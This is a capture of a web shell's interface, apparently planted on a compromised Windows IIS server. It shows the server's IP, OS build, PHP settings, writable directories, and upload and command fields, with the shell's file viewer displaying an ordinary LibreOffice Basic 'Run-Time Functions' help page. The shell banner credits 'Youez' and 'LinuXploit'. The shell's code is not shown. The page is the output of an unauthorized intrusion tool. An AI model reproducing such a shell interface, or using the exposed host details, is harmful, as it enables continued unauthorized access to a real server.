403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.217.101
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Program Files/LibreOffice/help/en-US/text/sbasic/shared/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Program Files/LibreOffice/help/en-US/text/sbasic/shared/03000000.html
<!DOCTYPE html>
<html lang="en-US" dir="ltr">
<head>
<base href="../../../../">
<noscript><meta http-equiv="refresh" content="0; URL=../../../../en-US/noscript.html"></noscript>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Run-Time Functions</title>
<link rel="shortcut icon" href="media/navigation/favicon.ico">
<link type="text/css" href="normalize.css" rel="Stylesheet">
<link type="text/css" href="prism.css" rel="Stylesheet">
<link type="text/css" href="default.css" rel="Stylesheet">
<script type="text/javascript" src="polyfills.js"></script><script type="text/javascript" src="languages.js"></script><script type="text/javascript" src="en-US/langnames.js"></script><script type="text/javascript" src="flexsearch.debug.js"></script><script type="text/javascript" src="prism.js"></script><script type="text/javascript" src="help2.js" defer></script><script type="text/javascript" src="a11y-toggle.js" defer></script><script type="text/javascript" src="paginathing.js" defer></script><script type="text/javascript" src="en-US/bookmarks.js" defer></script><script type="text/javascript" src="en-US/contents.js" defer></script><script type="text/javascript" src="help.js" defer></script><meta name="viewport" content="width=device-width,initial-scale=1">
</head>
<body>
<header id="TopLeftHeader"><a class="symbol" href="en-US/text/shared/05/new_help.html"><div></div></a><a class="logo" href="en-US/text/shared/05/new_help.html"><p dir="auto">LibreOffice 24.2 Help</p></a><div class="dropdowns"><div class="modules">
<button type="button" data-a11y-toggle="modules-nav" id="modules" aria-haspopup="true" aria-expanded="false" aria-controls="modules-nav">Module</button><nav id="modules-nav" hidden=""></nav>
</div></div></header><aside class="leftside"><input id="accordion-1" name="accordion-menu" type="checkbox"><label for="accordion-1" dir="auto">Contents</label><div id="Contents" class="contents-treeview"></div></aside><div id="SearchFrame"><div id="Bookmarks">
<input id="search-bar" type="search" class="search" placeholder="Search in bookmarks for chosen module" dir="auto"><div class="nav-container" tabindex="0"><nav class="index" dir="auto"></nav></div>
</div></div>
<div id="DisplayArea" itemprop="softwareHelp" itemscope="true" itemtype="http://schema.org/SoftwareApplication">


<a name="runtime"></a>

<h1 id="hd_id3152895" dir="auto">
<a name="doc_title"></a>Run-Time Functions</h1>
<p id="par_id3148983" class="paragraph" dir="auto">This section describes the Runtime Functions of LibreOffice Basic.</p>

<div class="embedded">
<a name="basic_constants"></a>
        
        <h2 id="hd_id051620171022255424" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03040000.html">Basic Constants</a></h2>
        <p id="par_id051620171022384640" class="paragraph" dir="auto"><span class="avis">Constants used in Basic programs</span></p>
    </div>
<div class="embedded">
<a name="variables"></a>
<h2 id="hd_id3149669" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03100000.html">Variables</a></h2>
<p id="par_id3147265" class="paragraph" dir="auto">The following statements and functions are for working with variables. You can use these functions to declare or define variables, convert variables from one type to another, or determine the variable type.</p>
</div>
<div class="embedded">
<a name="logi"></a>
  <h2 id="hd_id3147559" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03060000.html">Logical Operators</a></h2>
  <p id="par_id3153379" class="paragraph" dir="auto">The following logical operators are supported by LibreOffice Basic.</p>
  </div>
<div class="embedded">
<a name="operators"></a>


<h2 id="hd_id3150682" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03110100.html">Comparison Operators</a></h2>
<p id="par_id3156042" class="paragraph" dir="auto">Comparison operators compare two expressions. The result is returned as a boolean expression that determines if the comparison is <span class="literal">True</span> (-1) or <span class="literal">False</span> (0).</p>
</div>
<div class="embedded">
<a name="strings"></a>
  <h2 id="hd_id3156153" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03120000.html">Strings</a></h2>
  <p id="par_id3159176" class="paragraph" dir="auto">The following functions and statements validate and return strings.</p>
  </div>
<div class="embedded">
<a name="date_time"></a>
  <h2 id="hd_id3150502" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03030000.html">Date and Time Functions</a></h2>
  <p id="par_id3153255" class="paragraph" dir="auto">Use the statements and functions described here to perform date and time calculations.</p>
  </div>
<div class="embedded">
<a name="math"></a>
  <h2 id="hd_id3149234" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03070000.html">Mathematical Operators</a></h2>
  <p id="par_id3145068" class="paragraph" dir="auto">The following mathematical operators are supported in LibreOffice Basic.</p>
  </div>
<div class="embedded">
<a name="numeric"></a>
  <h2 id="hd_id3153127" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03080000.html">Numeric Functions</a></h2>
  <p id="par_id3148550" class="paragraph" dir="auto">The following numeric functions perform calculations. Mathematical and Boolean operators are described in a separate section. Functions differ from operators in that functions pass arguments and return a result, instead of operators that return a result by combining two numeric expressions.</p>
  </div>
<div class="embedded">
<a name="screen_IO"></a>
      <h2 id="hd_id3156280" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03010000.html">Screen I/O Functions</a></h2>
  <p id="par_id3153770" class="paragraph" dir="auto">This section describes the Runtime Functions used to call dialogs for the input and output of user entries.</p>
  </div>
<div class="embedded">
<a name="file_IO"></a>
  <h2 id="hd_id3156344" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03020000.html">File I/O Functions</a></h2>
  <p id="par_id3153360" class="paragraph" dir="auto">Use File I/O functions to create and manage user-defined (data) files.</p>
</div>
<div class="embedded">
<a name="prog_execution"></a>
  <h2 id="hd_id3145136" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03090000.html">Controlling Program Execution</a></h2>
  <p id="par_id3143268" class="paragraph" dir="auto">The following statements control the execution of a program.</p>
  </div>
<div class="embedded">
<a name="errorhandling"></a>
  <h2 id="hd_id3143271" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03050000.html">Error-Handling Functions</a></h2>
  <p id="par_id3145068" class="paragraph" dir="auto">Use the following statements and functions to define the way LibreOffice Basic reacts to run-time errors.</p>
  </div>
<div class="embedded">
<a name="other"></a>
<h2 id="hd_id3156027" dir="auto"><a target="_top" href="en-US/text/sbasic/shared/03130000.html">Other Commands</a></h2>
<p id="par_id3153312" class="paragraph" dir="auto">This is a list of the functions and the statements that are not included in the other categories.</p>
</div>
</div>
<div id="DonationFrame"></div>
<footer><div id="DEBUG" class="debug">
<h3 class="bug">Help content debug info:</h3>
<p dir="auto">This page is: <a href="https://opengrok.libreoffice.org/xref/help/source/text/sbasic/shared/03000000.xhp" target="_blank">/text/sbasic/shared/03000000.xhp</a></p>
<p dir="auto">Title is: Run-Time Functions</p>
<p id="bm_module" dir="auto"></p>
<p id="bm_system" dir="auto"></p>
<p id="bm_HID" dir="auto"></p>
</div></footer>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit